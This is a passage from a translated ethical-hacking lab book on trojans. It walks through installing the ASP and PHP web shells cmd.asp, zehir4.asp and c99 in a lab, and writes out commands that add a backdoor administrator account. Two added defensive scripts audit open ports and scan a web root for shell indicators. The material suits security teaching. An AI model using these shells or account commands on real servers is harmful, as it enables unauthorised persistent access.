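    The open-port check described above can be scripted. The following is an added example, not part of the original lab book: it parses `netstat -ano` and `tasklist /FO CSV /NH` output, flags listeners outside a baseline, and flags sockets whose owning PID tasklist does not list (relevant to a hidden process as in Lab 5). The sample output, PIDs, port 6666 and the baseline are constructed for illustration.

```python
import csv
import io

# Constructed sample of `netstat -ano` output (not captured from a real host).
NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       932
  TCP    0.0.0.0:6666           0.0.0.0:0              LISTENING       1820
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       2044
  TCP    172.16.84.2:1061       172.16.84.1:25         ESTABLISHED     1236
"""

# Constructed sample of `tasklist /FO CSV /NH` output; PID 1236 is absent.
TASKLIST = '''\
"svchost.exe","932","Console","0","4,120 K"
"cehclass.exe","1820","Console","0","3,004 K"
"nc.exe","2044","Console","0","1,512 K"
'''

# Hypothetical baseline for this host: (image name, port) pairs expected to listen.
ALLOWED = {("svchost.exe", 135)}

def parse_tasklist(text):
    """Map PID -> image name from tasklist CSV output."""
    return {int(row[1]): row[0] for row in csv.reader(io.StringIO(text)) if len(row) >= 2}

def parse_netstat(text):
    """Yield (local_port, state, pid) for each TCP row; headers and UDP rows are skipped."""
    for line in text.splitlines():
        f = line.split()
        if len(f) == 5 and f[0] == "TCP" and f[4].isdigit():
            port = int(f[1].rsplit(":", 1)[1])
            yield port, f[3], int(f[4])

def audit(netstat_text, tasklist_text, allowed=ALLOWED):
    """Return findings: unexpected listeners and sockets owned by unlisted PIDs."""
    procs = parse_tasklist(tasklist_text)
    findings = []
    for port, state, pid in parse_netstat(netstat_text):
        image = procs.get(pid)
        if image is None:
            # Cross-view mismatch: the socket table knows a PID the process list does not.
            findings.append(("pid-not-in-tasklist", pid, port, None))
        elif state == "LISTENING" and (image.lower(), port) not in allowed:
            findings.append(("unexpected-listener", pid, port, image))
    return findings

if __name__ == "__main__":
    print(*audit(NETSTAT, TASKLIST), sep="\n")
```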


    Based on the information CurrPorts provides, we can delete the file cehclass.exe by its path and remove the information about it in regedit, startup and so on.

    Exercise 3: Using web-based trojans

    Web-based trojans are generally more common in web environments. After a hacker has exploited a vulnerability and taken control of a web server, the hacker leaves behind a web-based trojan, through which the hacker can get in and out of the system on later occasions. This kind of trojan is very hard to detect, because it runs as a web page and uses system-access functions through languages such as asp, php and so on, so it cannot be detected as easily as connection-based trojans such as netcat, beast and so on. To carry out this lab we first have to install web servers, namely IIS and Apache.

    1/ Web-based trojans in ASP: We use the IIS web server with trojans written in this language. The author introduces 2 typical trojans, cmd.asp and zehir4.asp.

    First install the IIS web service (installation is fairly simple, and students can do this part themselves), then copy the 2 files into the www directory so they can be accessed through the web.


    We type the Dir command to view the files on the system. With a trojan like this we can view system information, upload and download through tftp, and add users to the system, for example with the commands net user hao hao /add and net Localgroup administrators hao /add. Go to the link http://192.168.1.116/zehir4.asp to look at the second web-based trojan.

    We see that this trojan is richer in features and more convenient: fetching and deleting files is done entirely through the web, and we can easily operate on the victim's machine.

    2/ Trojans in PHP: We use the Apache web server with a trojan written in this language. The author introduces a typical trojan, c99. First use the phpeasy program to install the following 3 packages together: apache, php and mysql. In this lab, however, you only need php and apache. Copy the trojan files into the www directory so that they can be run.


    This is a very dangerous trojan file: it can download and upload files, and it also lets us run applications such as perl, execute system functions, provide information about the current victim, and so on. Because of these properties, this trojan is very widely used by hackers (others include r57, phpshell and so on).
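    Because web-based trojans show up as script files in the web root rather than as open ports, a defender can sweep the web root for the system-access calls this section describes. The following is an added example, not part of the original lab book; the indicator list and the sample files are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Shell file names mentioned on this page; files are often renamed, so this is a weak signal.
KNOWN_NAMES = re.compile(r"(cmd\.asp|zehir4|c99|r57|phpshell)", re.I)
# System-access calls an ordinary content page rarely needs (heuristic list, an assumption).
INDICATORS = {
    ".php": re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval)\s*\(", re.I),
    ".asp": re.compile(r"(WScript\.Shell|Scripting\.FileSystemObject)", re.I),
}

def scan_webroot(root):
    """Return sorted (relative path, reasons) for script files that carry indicators."""
    hits = []
    for folder, _dirs, files in os.walk(root):
        for name in files:
            ext = os.path.splitext(name)[1].lower()
            if ext not in INDICATORS:
                continue
            path = os.path.join(folder, name)
            with open(path, "r", errors="replace") as fh:
                text = fh.read()
            reasons = sorted({m.group(1).lower() for m in INDICATORS[ext].finditer(text)})
            if KNOWN_NAMES.search(name):
                reasons.append("known-shell-name")
            if reasons:
                hits.append((os.path.relpath(path, root).replace(os.sep, "/"), reasons))
    return sorted(hits)

def build_sample_webroot():
    """Create a constructed web root: one plain page and two files carrying indicators."""
    root = tempfile.mkdtemp(prefix="www_")
    samples = {
        "index.php": "<?php echo 'hello'; ?>",
        "upload/img.php": "<?php echo shell_exec('ver'); ?>",  # constructed, fixed command
        "zehir4.asp": '<% Set fso = Server.CreateObject("Scripting.FileSystemObject") %>',
    }
    for rel, body in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    print(*scan_webroot(build_sample_webroot()), sep="\n")
```

    Hits are leads for review, not verdicts: legitimate applications also call some of these functions, so compare the results against a known-good copy of the site.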